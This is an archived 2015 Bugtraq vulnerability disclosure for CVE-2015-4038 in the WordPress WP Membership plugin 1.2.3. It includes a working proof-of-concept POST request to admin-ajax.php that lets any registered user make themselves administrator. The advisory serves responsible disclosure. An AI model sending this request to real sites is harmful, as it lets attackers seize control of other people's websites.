lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 1 Jun 2015 17:43:13 GMT
From: pan.vagenas@...il.com
To: bugtraq@...urityfocus.com
Subject: CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]

# Exploit Title: CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038

1 Description
  
Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. 
Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website.
  
2 Proof of Concept

* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`

3 Actions taken after discovery

Vendor was informed on 2015/05/19.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ